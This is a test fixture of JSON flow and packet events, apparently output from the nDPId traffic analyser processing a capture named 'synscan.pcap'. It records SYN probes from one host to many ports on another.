+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fwAADcGK3asEAAIQA2GNIzTA\/LdU4MZAAAAAGACEAAkmgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7YAADgGAL2sEAAIQA2GNIzTH5ndU4MZAAAAAGACBAAU8wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs2pkAADYGN9msEAAIQA2GNIzTDmrdU4MZAAAAAGACDAAeIgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsxEMAADMGUS+sEAAIQA2GNIzTA4bdU4MZAAAAAGACEAAlBgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAssU4AACUGciSsEAAIQA2GNIzSB7PdUoMYAAAAAGACCAAo3AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC18AACUGGBSsEAAIQA2GNIzSFGbdUoMYAAAAAGACCAAcKQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dwAAC4GOJasEAAIQA2GNIzSBEzdUoMYAAAAAGACDAAoQwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC\/AAACUGF4OsEAAIQA2GNIzSGgzdUoMYAAAAAGACCAAWgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsuskAACwGYamsEAAIQA2GNIzSIZjdUoMYAAAAAGACBAAS9wAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsXBEAACwGwGGsEAAIQA2GNIzSE4jdUoMYAAAAAGACBAAhBwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs5JMAADoGKd+sEAAIQA2GNIzSAsrdUoMYAAAAAGACDAApxQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAshEYAADgGjCysEAAIQA2GNIzSHvHdUoMYAAAAAGACBAAVngAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAspVMAADMGcB+sEAAIQA2GNIzSF+DdUoMYAAAAAGACEAAQrwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAskd4AACkGjZSsEAAIQA2GNIzSxHzdUoMYAAAAAGACCABsEgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+wAAC4G4oasEAAIQA2GNIzSGAzdUoMYAAAAAGACDAAUgwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ2YAADQG7QysEAAIQA2GNIzSNdfdUoMYAAAAAGACBAD+twAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAs1wMAADAGQW+sEAAIQA2GNIzSH0fdUoMYAAAAAGACBAAVSAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsnrUAADMGdr2sEAAIQA2GNIzSgAXdUoMYAAAAAGACEACoiQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsmXkAADsGc\/msEAAIQA2GNIzSBFHdUoMYAAAAAGACEAAkPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsX+sAAC8GuYesEAAIQA2GNIzSE7rdUoMYAAAAAGACEAAU1QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsrscAADQGZausEAAIQA2GNIzSBJfdUoMYAAAAAGACBAAv+AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAspigAADAGckqsEAAIQA2GNIzSDLzdUoMYAAAAAGACBAAn0wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsFq0AADAGAcasEAAIQA2GNIzSIyndUoMYAAAAAGACBAARZgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsr38AACUGc\/OsEAAIQA2GNIzSOpvdUoMYAAAAAGACCAD18wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 